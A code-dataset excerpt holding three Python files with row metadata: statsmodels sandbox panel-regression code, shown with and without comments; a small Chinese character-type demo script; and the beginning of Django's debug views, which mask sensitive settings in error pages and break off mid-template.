    # Placeholder for a seemingly-unrelated-regressions panel model;
    # not implemented yet.
    pass
class SEMPanel(PanelModel):
    # Placeholder for a simultaneous-equations panel model; not
    # implemented yet.
    pass
class DynamicPanel(PanelModel):
    # Placeholder for a dynamic panel model; not implemented yet.
    pass
# Demo / scratch code: fits the sandbox estimators on the Grunfeld data
# and numerically checks the random-effects covariance construction
# against repanel_cov.
if __name__ == "__main__":
    import numpy.lib.recfunctions as nprf
    import pandas
    from pandas import Panel
    import statsmodels.api as sm
    data = sm.datasets.grunfeld.load()
    # Baltagi does not include American Steel
    endog = data.endog[:-20]
    fullexog = data.exog[:-20]
#    fullexog.sort(order=['firm','year'])
    panel_arr = nprf.append_fields(fullexog, 'investment', endog, float,
        usemask=False)
    panel_df = pandas.DataFrame(panel_arr)
    panel_panda = panel_df.set_index(['year', 'firm']).to_panel()

    # the most cumbersome way of doing it as far as preprocessing by hand
    exog = fullexog[['value','capital']].view(float).reshape(-1,2)
    exog = sm.add_constant(exog, prepend=False)
    panel = group(fullexog['firm'])
    year = fullexog['year']
    panel_mod = PanelModel(endog, exog, panel, year, xtnames=['firm','year'],
        equation='invest value capital')
    # note that equation does not actually do anything but name the variables
    panel_ols = panel_mod.fit(model='pooled')
    panel_be = panel_mod.fit(model='between', effects='oneway')
    panel_fe = panel_mod.fit(model='fixed', effects='oneway')
    panel_bet = panel_mod.fit(model='between', effects='time')
    panel_fet = panel_mod.fit(model='fixed', effects='time')
    panel_fe2 = panel_mod.fit(model='fixed', effects='twoways')

#see also Baltagi (3rd edt) 3.3 THE RANDOM EFFECTS MODEL p.35
#for explicit formulas for spectral decomposition
#but this works also for unbalanced panel
#
#I also just saw: 9.4.2 The Random Effects Model p.176 which is
#partially almost the same as I did
#
#this needs to use sparse matrices for larger datasets
#
#"""
#
#import numpy as np
#
    # Hand-built two-way random effects covariance for a small example.
    groups = np.array([0,0,0,1,1,2,2,2])
    nobs = groups.shape[0]
    groupuniq = np.unique(groups)
    periods = np.array([0,1,2,1,2,0,1,2])
    perioduniq = np.unique(periods)
    dummygr = (groups[:,None] == groupuniq).astype(float)
    dummype = (periods[:,None] == perioduniq).astype(float)
    sigma = 1.
    sigmagr = np.sqrt(2.)
    sigmape = np.sqrt(3.)
    #dummyall = np.c_[sigma*np.ones((nobs,1)), sigmagr*dummygr,
    #                 sigmape*dummype]
    #exclude constant ?
    dummyall = np.c_[sigmagr*dummygr, sigmape*dummype]
    # omega is the error variance-covariance matrix for the stacked
    # observations
    omega = np.dot(dummyall, dummyall.T) + sigma* np.eye(nobs)
    print(omega)
    print(np.linalg.cholesky(omega))
    ev, evec = np.linalg.eigh(omega)  #eig does not work
    omegainv = np.dot(evec, (1/ev * evec).T)
    omegainv2 = np.linalg.inv(omega)
    omegacomp = np.dot(evec, (ev * evec).T)
    print(np.max(np.abs(omegacomp - omega)))
    #check
    #print(np.dot(omegainv,omega)
    print(np.max(np.abs(np.dot(omegainv,omega) - np.eye(nobs))))
    omegainvhalf = evec/np.sqrt(ev)  #not sure whether ev should not be column
    print(np.max(np.abs(np.dot(omegainvhalf,omegainvhalf.T) - omegainv)))
    # now we can use omegainvhalf in GLS (instead of the cholesky)

    # cross-check the hand-built matrices against repanel_cov
    sigmas2 = np.array([sigmagr, sigmape, sigma])
    groups2 = np.column_stack((groups, periods))
    omega_, omegainv_, omegainvhalf_ = repanel_cov(groups2, sigmas2)
    print(np.max(np.abs(omega_ - omega)))
    print(np.max(np.abs(omegainv_ - omegainv)))
    print(np.max(np.abs(omegainvhalf_ - omegainvhalf)))

    # notation Baltagi (3rd) section 9.4.1 (Fixed Effects Model)
    Pgr = reduce(np.dot,[dummygr,
            np.linalg.inv(np.dot(dummygr.T, dummygr)),dummygr.T])
    Qgr = np.eye(nobs) - Pgr
    # within group effect: np.dot(Qgr, groups)
    # but this is not memory efficient, compared to groupstats
    print(np.max(np.abs(np.dot(Qgr, groups))))
| 32.966063 | 78 | 0.606135 | from functools import reduce
import numpy as np
from statsmodels.regression.linear_model import GLS
__all__ = ["PanelModel"]
from pandas import Panel
def group(X):
uniq_dict = {}
group = np.zeros(len(X))
for i in range(len(X)):
if not X[i] in uniq_dict:
uniq_dict.update({X[i] : len(uniq_dict)})
group[i] = uniq_dict[X[i]]
return group
def repanel_cov(groups, sigmas):
if groups.ndim == 1:
groups = groups[:,None]
nobs, nre = groups.shape
omega = sigmas[-1]*np.eye(nobs)
for igr in range(nre):
group = groups[:,igr:igr+1]
groupuniq = np.unique(group)
dummygr = sigmas[igr] * (group == groupuniq).astype(float)
omega += np.dot(dummygr, dummygr.T)
ev, evec = np.linalg.eigh(omega)
omegainv = np.dot(evec, (1/ev * evec).T)
omegainvhalf = evec/np.sqrt(ev)
return omega, omegainv, omegainvhalf
class PanelData(Panel):
pass
class PanelModel(object):
def __init__(self, endog=None, exog=None, panel=None, time=None,
xtnames=None, equation=None, panel_data=None):
if panel_data is None:
#panel_arr, and time_arr cannot be None.")
self.initialize(endog, exog, panel, time, xtnames, equation)
#must be a string containing the name of the endogenous variable")
def initialize(self, endog, exog, panel, time, xtnames, equation):
names = equation.split(" ")
self.endog_name = names[0]
exog_names = names[1:]
self.panel_name = xtnames[0]
self.time_name = xtnames[1]
novar = exog.var(0) == 0
if True in novar:
cons_index = np.where(novar == 1)[0][0]
exog_names.insert(cons_index, 'cons')
self._cons_index = novar
self.exog_names = exog_names
self.endog = np.squeeze(np.asarray(endog))
exog = np.asarray(exog)
self.exog = exog
self.panel = np.asarray(panel)
self.time = np.asarray(time)
self.paneluniq = np.unique(panel)
self.timeuniq = np.unique(time)
# Initialize pandas objects.
#
# See PanelModel.
# """
def initialize_pandas(self, panel_data, endog_name, exog_name):
self.panel_data = panel_data
endog = panel_data[endog_name].values
self.endog = np.squeeze(endog)
if exog_name is None:
exog_name = panel_data.columns.tolist()
exog_name.remove(endog_name)
self.exog = panel_data.filterItems(exog_name).values
self._exog_name = exog_name
self._endog_name = endog_name
self._timeseries = panel_data.major_axis
self._panelseries = panel_data.minor_axis
def _group_mean(self, X, index='oneway', counts=False, dummies=False):
if index == 'oneway':
Y = self.panel
uniq = self.paneluniq
elif index == 'time':
Y = self.time
uniq = self.timeuniq
else:
raise ValueError("index %s not understood" % index)
print(Y, uniq, uniq[:,None], len(Y), len(uniq), len(uniq[:,None]),
index)
dummy = (Y == uniq[:,None]).astype(float)
if X.ndim > 1:
mean = np.dot(dummy,X)/dummy.sum(1)[:,None]
else:
mean = np.dot(dummy,X)/dummy.sum(1)
if counts is False and dummies is False:
return mean
elif counts is True and dummies is False:
return mean, dummy.sum(1)
elif counts is True and dummies is True:
return mean, dummy.sum(1), dummy
elif counts is False and dummies is True:
return mean, dummy
def fit(self, model=None, method=None, effects='oneway'):
if method:
method = method.lower()
model = model.lower()
if method and method not in ["lsdv", "demeaned", "mle",
"gls", "be", "fe"]:
raise ValueError("%s not a valid method" % method)
if model == 'pooled':
return GLS(self.endog, self.exog).fit()
if model == 'between':
return self._fit_btwn(method, effects)
if model == 'fixed':
return self._fit_fixed(method, effects)
# Fit using least squares dummy variables.
#
# Notes
# -----
# Should only be used for small `nobs`.
# """
def _fit_btwn(self, method, effects):
if effects != "twoway":
endog = self._group_mean(self.endog, index=effects)
exog = self._group_mean(self.exog, index=effects)
else:
raise ValueError("%s effects is not valid for the between "
"estimator" % effects)
befit = GLS(endog, exog).fit()
return befit
def _fit_fixed(self, method, effects):
endog = self.endog
exog = self.exog
demeantwice = False
if effects in ["oneway","twoways"]:
if effects == "twoways":
demeantwice = True
effects = "oneway"
endog_mean, counts = self._group_mean(endog, index=effects,
counts=True)
exog_mean = self._group_mean(exog, index=effects)
counts = counts.astype(int)
endog = endog - np.repeat(endog_mean, counts)
exog = exog - np.repeat(exog_mean, counts, axis=0)
if demeantwice or effects == "time":
endog_mean, dummies = self._group_mean(endog, index="time",
dummies=True)
exog_mean = self._group_mean(exog, index="time")
endog = endog - np.dot(endog_mean, dummies)
exog = exog - np.dot(dummies.T, exog_mean)
fefit = GLS(endog, exog[:,-self._cons_index]).fit()
return fefit
class SURPanel(PanelModel):
pass
class SEMPanel(PanelModel):
pass
class DynamicPanel(PanelModel):
pass
if __name__ == "__main__":
import numpy.lib.recfunctions as nprf
import pandas
from pandas import Panel
import statsmodels.api as sm
data = sm.datasets.grunfeld.load()
endog = data.endog[:-20]
fullexog = data.exog[:-20]
panel_arr = nprf.append_fields(fullexog, 'investment', endog, float,
usemask=False)
panel_df = pandas.DataFrame(panel_arr)
panel_panda = panel_df.set_index(['year', 'firm']).to_panel()
exog = fullexog[['value','capital']].view(float).reshape(-1,2)
exog = sm.add_constant(exog, prepend=False)
panel = group(fullexog['firm'])
year = fullexog['year']
panel_mod = PanelModel(endog, exog, panel, year, xtnames=['firm','year'],
equation='invest value capital')
panel_ols = panel_mod.fit(model='pooled')
panel_be = panel_mod.fit(model='between', effects='oneway')
panel_fe = panel_mod.fit(model='fixed', effects='oneway')
panel_bet = panel_mod.fit(model='between', effects='time')
panel_fet = panel_mod.fit(model='fixed', effects='time')
panel_fe2 = panel_mod.fit(model='fixed', effects='twoways')
#
#import numpy as np
#
groups = np.array([0,0,0,1,1,2,2,2])
nobs = groups.shape[0]
groupuniq = np.unique(groups)
periods = np.array([0,1,2,1,2,0,1,2])
perioduniq = np.unique(periods)
dummygr = (groups[:,None] == groupuniq).astype(float)
dummype = (periods[:,None] == perioduniq).astype(float)
sigma = 1.
sigmagr = np.sqrt(2.)
sigmape = np.sqrt(3.)
#dummyall = np.c_[sigma*np.ones((nobs,1)), sigmagr*dummygr,
# sigmape*dummype]
#exclude constant ?
dummyall = np.c_[sigmagr*dummygr, sigmape*dummype]
# omega is the error variance-covariance matrix for the stacked
# observations
omega = np.dot(dummyall, dummyall.T) + sigma* np.eye(nobs)
print(omega)
print(np.linalg.cholesky(omega))
ev, evec = np.linalg.eigh(omega) #eig does not work
omegainv = np.dot(evec, (1/ev * evec).T)
omegainv2 = np.linalg.inv(omega)
omegacomp = np.dot(evec, (ev * evec).T)
print(np.max(np.abs(omegacomp - omega)))
#check
#print(np.dot(omegainv,omega)
print(np.max(np.abs(np.dot(omegainv,omega) - np.eye(nobs))))
omegainvhalf = evec/np.sqrt(ev) #not sure whether ev should not be column
print(np.max(np.abs(np.dot(omegainvhalf,omegainvhalf.T) - omegainv)))
# now we can use omegainvhalf in GLS (instead of the cholesky)
sigmas2 = np.array([sigmagr, sigmape, sigma])
groups2 = np.column_stack((groups, periods))
omega_, omegainv_, omegainvhalf_ = repanel_cov(groups2, sigmas2)
print(np.max(np.abs(omega_ - omega)))
print(np.max(np.abs(omegainv_ - omegainv)))
print(np.max(np.abs(omegainvhalf_ - omegainvhalf)))
# notation Baltagi (3rd) section 9.4.1 (Fixed Effects Model)
Pgr = reduce(np.dot,[dummygr,
np.linalg.inv(np.dot(dummygr.T, dummygr)),dummygr.T])
Qgr = np.eye(nobs) - Pgr
# within group effect: np.dot(Qgr, groups)
# but this is not memory efficient, compared to groupstats
print(np.max(np.abs(np.dot(Qgr, groups))))
| true | true |
1c331bf1d66060169113b764d33287441ab11a06 | 139 | py | Python | InClass/Day24/05.py | walkingtyphoon/Python-workspace | e872bce82b2bac3dd5d809f8576345ccc1c6afb7 | [
"Apache-2.0"
] | null | null | null | InClass/Day24/05.py | walkingtyphoon/Python-workspace | e872bce82b2bac3dd5d809f8576345ccc1c6afb7 | [
"Apache-2.0"
] | null | null | null | InClass/Day24/05.py | walkingtyphoon/Python-workspace | e872bce82b2bac3dd5d809f8576345ccc1c6afb7 | [
"Apache-2.0"
] | null | null | null | value = input("请输入你需要辨别的字符:")
print(value.isdigit())
# 判断是否为数字
print(value.isalpha())
# 判断是否为字母
print(value.isspace())
# 判断是否为空格或者是制表符,空格
| 15.444444 | 29 | 0.726619 | value = input("请输入你需要辨别的字符:")
print(value.isdigit())
print(value.isalpha())
print(value.isspace())
| true | true |
1c331d68032e12d278f28e029f665df346a53f5d | 42,579 | py | Python | django/views/debug.py | skyl/django | 843e7450ddcb820b2bdc6d47d6c4aab9820a46c4 | [
"BSD-3-Clause"
] | 1 | 2021-11-22T17:41:19.000Z | 2021-11-22T17:41:19.000Z | django/views/debug.py | skyl/django | 843e7450ddcb820b2bdc6d47d6c4aab9820a46c4 | [
"BSD-3-Clause"
] | null | null | null | django/views/debug.py | skyl/django | 843e7450ddcb820b2bdc6d47d6c4aab9820a46c4 | [
"BSD-3-Clause"
] | 1 | 2020-06-03T07:55:20.000Z | 2020-06-03T07:55:20.000Z | from __future__ import unicode_literals
import datetime
import os
import re
import sys
import types
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.http import (HttpResponse, HttpResponseServerError,
HttpResponseNotFound, HttpRequest, build_request_repr)
from django.template import Template, Context, TemplateDoesNotExist
from django.template.defaultfilters import force_escape, pprint
from django.utils.html import escape
from django.utils.encoding import force_bytes, smart_text
from django.utils.module_loading import import_by_path
from django.utils import six
# Setting-name fragments whose values must never appear in debug output.
HIDDEN_SETTINGS = re.compile('API|TOKEN|KEY|SECRET|PASS|PROFANITIES_LIST|SIGNATURE')
# Replacement string shown in place of any cleansed (sensitive) value.
CLEANSED_SUBSTITUTE = '********************'
def linebreak_iter(template_source):
    """Yield the start offset of every line in *template_source*.

    The first value is always 0 and the final value is one past the end
    of the string, so consecutive pairs bound each line.
    """
    start = 0
    yield start
    newline_at = template_source.find('\n', start)
    while newline_at != -1:
        start = newline_at + 1
        yield start
        newline_at = template_source.find('\n', start)
    yield len(template_source) + 1
def cleanse_setting(key, value):
    """Return *value* with sensitive content masked.

    A key matching HIDDEN_SETTINGS has its whole value replaced with
    CLEANSED_SUBSTITUTE; dict values are cleansed recursively, key by
    key. Keys the regex cannot search (e.g. non-strings) leave the
    value untouched.
    """
    try:
        if HIDDEN_SETTINGS.search(key):
            return CLEANSED_SUBSTITUTE
        if isinstance(value, dict):
            return dict((k, cleanse_setting(k, v)) for k, v in value.items())
        return value
    except TypeError:
        # Un-searchable key: pass the value through unchanged.
        return value
def get_safe_settings():
    """Return a dict of every upper-case setting, with sensitive values
    blurred out via cleanse_setting."""
    cleansed_settings = {}
    for name in dir(settings):
        if not name.isupper():
            continue
        cleansed_settings[name] = cleanse_setting(name, getattr(settings, name))
    return cleansed_settings
def technical_500_response(request, exc_type, exc_value, tb):
    """
    Create a technical server error response for *request*.

    The last three arguments are the values returned from
    sys.exc_info(). AJAX requests get a plain-text traceback; all other
    requests get the full HTML debug page.
    """
    reporter = ExceptionReporter(request, exc_type, exc_value, tb)
    if request.is_ajax():
        return HttpResponseServerError(reporter.get_traceback_text(),
                                       content_type='text/plain')
    return HttpResponseServerError(reporter.get_traceback_html(),
                                   content_type='text/html')
# Module-level cache for the single default exception reporter filter
# instance; populated lazily by get_exception_reporter_filter().
default_exception_reporter_filter = None
def get_exception_reporter_filter(request):
    """Return the exception reporter filter to use for *request*.

    A filter attached to the request (``request.exception_reporter_filter``)
    takes precedence; otherwise the class named by the
    DEFAULT_EXCEPTION_REPORTER_FILTER setting is instantiated once and
    cached at module level.
    """
    global default_exception_reporter_filter
    if default_exception_reporter_filter is None:
        # First use: import and instantiate the configured default filter.
        filter_cls = import_by_path(settings.DEFAULT_EXCEPTION_REPORTER_FILTER)
        default_exception_reporter_filter = filter_cls()
    if not request:
        return default_exception_reporter_filter
    return getattr(request, 'exception_reporter_filter',
                   default_exception_reporter_filter)
class ExceptionReporterFilter(object):
    """
    Base class for exception reporter filters.

    Every hook has a lenient default (nothing is hidden); subclasses
    override individual hooks to cleanse sensitive data before it is
    rendered in debug pages or error reports.
    """
    def get_request_repr(self, request):
        """Repr of *request*, with POST data possibly cleansed."""
        if request is None:
            return repr(None)
        post_override = self.get_post_parameters(request)
        return build_request_repr(request, POST_override=post_override)

    def get_post_parameters(self, request):
        """Return the (uncleansed) POST parameters of *request*."""
        return {} if request is None else request.POST

    def get_traceback_frame_variables(self, request, tb_frame):
        """Return the frame's local variables as (name, value) pairs."""
        return list(six.iteritems(tb_frame.f_locals))
class SafeExceptionReporterFilter(ExceptionReporterFilter):
    """
    Use annotations made by the sensitive_post_parameters and
    sensitive_variables decorators to filter out sensitive information.
    """
    def is_active(self, request):
        """
        This filter is to add safety in production environments (i.e. DEBUG
        is False). If DEBUG is True then your site is not safe anyway.
        This hook is provided as a convenience to easily activate or
        deactivate the filter on a per request basis.
        """
        return settings.DEBUG is False
    def get_post_parameters(self, request):
        """
        Replaces the values of POST parameters marked as sensitive with
        stars (*********).
        """
        if request is None:
            return {}
        else:
            # Names annotated by the sensitive_post_parameters decorator, or
            # the string '__ALL__' meaning every parameter is sensitive.
            sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
            if self.is_active(request) and sensitive_post_parameters:
                # Work on a copy so request.POST itself is never mutated.
                cleansed = request.POST.copy()
                if sensitive_post_parameters == '__ALL__':
                    # Cleanse all parameters.
                    for k, v in cleansed.items():
                        cleansed[k] = CLEANSED_SUBSTITUTE
                    return cleansed
                else:
                    # Cleanse only the specified parameters.
                    for param in sensitive_post_parameters:
                        if param in cleansed:
                            cleansed[param] = CLEANSED_SUBSTITUTE
                    return cleansed
            else:
                return request.POST
    def get_traceback_frame_variables(self, request, tb_frame):
        """
        Replaces the values of variables marked as sensitive with
        stars (*********).
        """
        # Loop through the frame's callers to see if the sensitive_variables
        # decorator was used.
        current_frame = tb_frame.f_back
        sensitive_variables = None
        while current_frame is not None:
            if (current_frame.f_code.co_name == 'sensitive_variables_wrapper'
                and 'sensitive_variables_wrapper' in current_frame.f_locals):
                # The sensitive_variables decorator was used, so we take note
                # of the sensitive variables' names.
                wrapper = current_frame.f_locals['sensitive_variables_wrapper']
                sensitive_variables = getattr(wrapper, 'sensitive_variables', None)
                break
            current_frame = current_frame.f_back
        cleansed = {}
        if self.is_active(request) and sensitive_variables:
            if sensitive_variables == '__ALL__':
                # Cleanse all variables
                for name, value in tb_frame.f_locals.items():
                    cleansed[name] = CLEANSED_SUBSTITUTE
            else:
                # Cleanse specified variables
                for name, value in tb_frame.f_locals.items():
                    if name in sensitive_variables:
                        value = CLEANSED_SUBSTITUTE
                    elif isinstance(value, HttpRequest):
                        # Cleanse the request's POST parameters.
                        value = self.get_request_repr(value)
                    cleansed[name] = value
        else:
            # Potentially cleanse only the request if it's one of the frame variables.
            for name, value in tb_frame.f_locals.items():
                if isinstance(value, HttpRequest):
                    # Cleanse the request's POST parameters.
                    value = self.get_request_repr(value)
                cleansed[name] = value
        if (tb_frame.f_code.co_name == 'sensitive_variables_wrapper'
            and 'sensitive_variables_wrapper' in tb_frame.f_locals):
            # For good measure, obfuscate the decorated function's arguments in
            # the sensitive_variables decorator's frame, in case the variables
            # associated with those arguments were meant to be obfuscated from
            # the decorated function's frame.
            cleansed['func_args'] = CLEANSED_SUBSTITUTE
            cleansed['func_kwargs'] = CLEANSED_SUBSTITUTE
        return cleansed.items()
class ExceptionReporter(object):
    """
    A class to organize and coordinate reporting on exceptions.

    Collects the traceback, frame variables (filtered through the
    exception reporter filter), template-origin information, and safe
    settings, and renders them as HTML or plain text.
    """
    def __init__(self, request, exc_type, exc_value, tb, is_email=False):
        self.request = request
        self.filter = get_exception_reporter_filter(self.request)
        self.exc_type = exc_type
        self.exc_value = exc_value
        self.tb = tb
        self.is_email = is_email
        self.template_info = None
        self.template_does_not_exist = False
        self.loader_debug_info = None
        # Handle deprecated string exceptions
        if isinstance(self.exc_type, six.string_types):
            self.exc_value = Exception('Deprecated String Exception: %r' % self.exc_type)
            self.exc_type = type(self.exc_value)
    def get_traceback_data(self):
        "Return a Context instance containing traceback information."
        if self.exc_type and issubclass(self.exc_type, TemplateDoesNotExist):
            from django.template.loader import template_source_loaders
            self.template_does_not_exist = True
            self.loader_debug_info = []
            for loader in template_source_loaders:
                try:
                    source_list_func = loader.get_template_sources
                    # NOTE: This assumes exc_value is the name of the template that
                    # the loader attempted to load.
                    template_list = [{'name': t, 'exists': os.path.exists(t)}
                                     for t in source_list_func(str(self.exc_value))]
                except AttributeError:
                    template_list = []
                loader_name = loader.__module__ + '.' + loader.__class__.__name__
                self.loader_debug_info.append({
                    'loader': loader_name,
                    'templates': template_list,
                })
        if (settings.TEMPLATE_DEBUG and
                hasattr(self.exc_value, 'django_template_source')):
            self.get_template_exception_info()
        frames = self.get_traceback_frames()
        for i, frame in enumerate(frames):
            if 'vars' in frame:
                # Pretty-print and escape frame variables for display.
                frame['vars'] = [(k, force_escape(pprint(v))) for k, v in frame['vars']]
                frames[i] = frame
        unicode_hint = ''
        if self.exc_type and issubclass(self.exc_type, UnicodeError):
            start = getattr(self.exc_value, 'start', None)
            end = getattr(self.exc_value, 'end', None)
            if start is not None and end is not None:
                # Show a small window around the offending characters.
                unicode_str = self.exc_value.args[1]
                unicode_hint = smart_text(unicode_str[max(start-5, 0):min(end+5, len(unicode_str))], 'ascii', errors='replace')
        from django import get_version
        c = {
            'is_email': self.is_email,
            'unicode_hint': unicode_hint,
            'frames': frames,
            'request': self.request,
            'filtered_POST': self.filter.get_post_parameters(self.request),
            'settings': get_safe_settings(),
            'sys_executable': sys.executable,
            'sys_version_info': '%d.%d.%d' % sys.version_info[0:3],
            'server_time': datetime.datetime.now(),
            'django_version_info': get_version(),
            'sys_path' : sys.path,
            'template_info': self.template_info,
            'template_does_not_exist': self.template_does_not_exist,
            'loader_debug_info': self.loader_debug_info,
        }
        # Check whether exception info is available
        if self.exc_type:
            c['exception_type'] = self.exc_type.__name__
        if self.exc_value:
            c['exception_value'] = smart_text(self.exc_value, errors='replace')
        if frames:
            c['lastframe'] = frames[-1]
        return c
    def get_traceback_html(self):
        "Return HTML version of debug 500 HTTP error page."
        t = Template(TECHNICAL_500_TEMPLATE, name='Technical 500 template')
        c = Context(self.get_traceback_data())
        return t.render(c)
    def get_traceback_text(self):
        "Return plain text version of debug 500 HTTP error page."
        t = Template(TECHNICAL_500_TEXT_TEMPLATE, name='Technical 500 template')
        # autoescape off: the output is text/plain, not HTML.
        c = Context(self.get_traceback_data(), autoescape=False)
        return t.render(c)
    def get_template_exception_info(self):
        """Populate self.template_info with the failing template's source
        context: the lines around the error and the exact error span."""
        origin, (start, end) = self.exc_value.django_template_source
        template_source = origin.reload()
        context_lines = 10
        line = 0
        upto = 0
        source_lines = []
        before = during = after = ""
        # line_end is the offset just past the current line's newline.
        # (Renamed from `next`, which shadowed the builtin.)
        for num, line_end in enumerate(linebreak_iter(template_source)):
            if start >= upto and end <= line_end:
                # The error span falls entirely on this line; split it into
                # before / during / after for highlighting.
                line = num
                before = escape(template_source[upto:start])
                during = escape(template_source[start:end])
                after = escape(template_source[end:line_end])
            source_lines.append((num, escape(template_source[upto:line_end])))
            upto = line_end
        total = len(source_lines)
        top = max(1, line - context_lines)
        bottom = min(total, line + 1 + context_lines)
        # In some rare cases, exc_value.args might be empty.
        try:
            message = self.exc_value.args[0]
        except IndexError:
            message = '(Could not get exception message)'
        self.template_info = {
            'message': message,
            'source_lines': source_lines[top:bottom],
            'before': before,
            'during': during,
            'after': after,
            'top': top,
            'bottom': bottom,
            'total': total,
            'line': line,
            'name': origin.name,
        }
    def _get_lines_from_file(self, filename, lineno, context_lines, loader=None, module_name=None):
        """
        Returns context_lines before and after lineno from file.
        Returns (pre_context_lineno, pre_context, context_line, post_context).
        """
        source = None
        # Prefer the module loader's view of the source (e.g. for zipimports).
        if loader is not None and hasattr(loader, "get_source"):
            source = loader.get_source(module_name)
            if source is not None:
                source = source.splitlines()
        if source is None:
            try:
                with open(filename, 'rb') as fp:
                    source = fp.readlines()
            except (OSError, IOError):
                pass
        if source is None:
            return None, [], None, []
        # If we just read the source from a file, or if the loader did not
        # apply tokenize.detect_encoding to decode the source into a Unicode
        # string, then we should do that ourselves.
        if isinstance(source[0], six.binary_type):
            encoding = 'ascii'
            for line in source[:2]:
                # File coding may be specified. Match pattern from PEP-263
                # (http://www.python.org/dev/peps/pep-0263/)
                match = re.search(br'coding[:=]\s*([-\w.]+)', line)
                if match:
                    encoding = match.group(1).decode('ascii')
                    break
            source = [six.text_type(sline, encoding, 'replace') for sline in source]
        lower_bound = max(0, lineno - context_lines)
        upper_bound = lineno + context_lines
        pre_context = [line.strip('\n') for line in source[lower_bound:lineno]]
        context_line = source[lineno].strip('\n')
        post_context = [line.strip('\n') for line in source[lineno+1:upper_bound]]
        return lower_bound, pre_context, context_line, post_context
    def get_traceback_frames(self):
        """Walk self.tb and return a list of frame dicts (filename, function,
        line numbers, surrounding source, filtered local variables)."""
        frames = []
        tb = self.tb
        while tb is not None:
            # Support for __traceback_hide__ which is used by a few libraries
            # to hide internal frames.
            if tb.tb_frame.f_locals.get('__traceback_hide__'):
                tb = tb.tb_next
                continue
            filename = tb.tb_frame.f_code.co_filename
            function = tb.tb_frame.f_code.co_name
            lineno = tb.tb_lineno - 1
            loader = tb.tb_frame.f_globals.get('__loader__')
            module_name = tb.tb_frame.f_globals.get('__name__') or ''
            pre_context_lineno, pre_context, context_line, post_context = self._get_lines_from_file(filename, lineno, 7, loader, module_name)
            if pre_context_lineno is not None:
                frames.append({
                    'tb': tb,
                    'type': module_name.startswith('django.') and 'django' or 'user',
                    'filename': filename,
                    'function': function,
                    'lineno': lineno + 1,
                    'vars': self.filter.get_traceback_frame_variables(self.request, tb.tb_frame),
                    'id': id(tb),
                    'pre_context': pre_context,
                    'context_line': context_line,
                    'post_context': post_context,
                    'pre_context_lineno': pre_context_lineno + 1,
                })
            tb = tb.tb_next
        return frames
    def format_exception(self):
        """
        Return the same data as from traceback.format_exception.
        """
        import traceback
        frames = self.get_traceback_frames()
        tb = [(f['filename'], f['lineno'], f['function'], f['context_line']) for f in frames]
        # Renamed from `list`, which shadowed the builtin of the same name.
        trace = ['Traceback (most recent call last):\n']
        trace += traceback.format_list(tb)
        trace += traceback.format_exception_only(self.exc_type, self.exc_value)
        return trace
def technical_404_response(request, exception):
    "Create a technical 404 error response. The exception should be the Http404."
    try:
        # Http404 raised by the URL resolver carries the list of patterns tried.
        tried = exception.args[0]['tried']
    except (IndexError, TypeError, KeyError):
        tried = []
    else:
        # A bare project (empty URLconf, or only the default admin pattern at
        # the root URL) gets the friendly "It worked!" welcome page instead.
        if (not tried # empty URLconf
            or (request.path == '/'
                and len(tried) == 1 # default URLconf
                and len(tried[0]) == 1
                and tried[0][0].app_name == tried[0][0].namespace == 'admin')):
            return default_urlconf(request)
    urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
    if isinstance(urlconf, types.ModuleType):
        urlconf = urlconf.__name__
    t = Template(TECHNICAL_404_TEMPLATE, name='Technical 404 template')
    c = Context({
        'urlconf': urlconf,
        'root_urlconf': settings.ROOT_URLCONF,
        'request_path': request.path_info[1:], # Trim leading slash
        'urlpatterns': tried,
        # NOTE(review): force_bytes here renders as b'...' on Python 3 —
        # upstream later uses a text conversion; confirm intended output.
        'reason': force_bytes(exception, errors='replace'),
        'request': request,
        'settings': get_safe_settings(),
    })
    return HttpResponseNotFound(t.render(c), content_type='text/html')
def default_urlconf(request):
    "Create an empty URLconf 404 error response."
    # Render the embedded welcome page; no context variables are needed.
    template = Template(DEFAULT_URLCONF_TEMPLATE, name='Default URLconf template')
    body = template.render(Context({}))
    return HttpResponse(body, content_type='text/html')
#
# Templates are embedded in the file so that we know the error handler will
# always work even if the template loader is broken.
#
TECHNICAL_500_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}{% if request %} at {{ request.path_info|escape }}{% endif %}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
code, pre { font-size: 100%; white-space: pre-wrap; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; }
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
table.vars { margin:5px 0 2px 40px; }
table.vars td, table.req td { font-family:monospace; }
table td.code { width:100%; }
table td.code pre { overflow:hidden; }
table.source th { color:#666; }
table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
ul.traceback { list-style-type:none; color: #222; }
ul.traceback li.frame { padding-bottom:1em; color:#666; }
ul.traceback li.user { background-color:#e0e0e0; color:#000 }
div.context { padding:10px 0; overflow:hidden; }
div.context ol { padding-left:30px; margin:0 10px; list-style-position: inside; }
div.context ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; }
div.context ol li pre { display:inline; }
div.context ol.context-line li { color:#505050; background-color:#dfdfdf; }
div.context ol.context-line li span { position:absolute; right:32px; }
.user div.context ol.context-line li { background-color:#bbb; color:#000; }
.user div.context ol li { color:#666; }
div.commands { margin-left: 40px; }
div.commands a { color:#555; text-decoration:none; }
.user div.commands a { color: black; }
#summary { background: #ffc; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#template, #template-not-exist { background:#f6f6f6; }
#template-not-exist ul { margin: 0 0 0 20px; }
#unicode-hint { background:#eee; }
#traceback { background:#eee; }
#requestinfo { background:#f6f6f6; padding-left:120px; }
#summary table { border:none; background:transparent; }
#requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
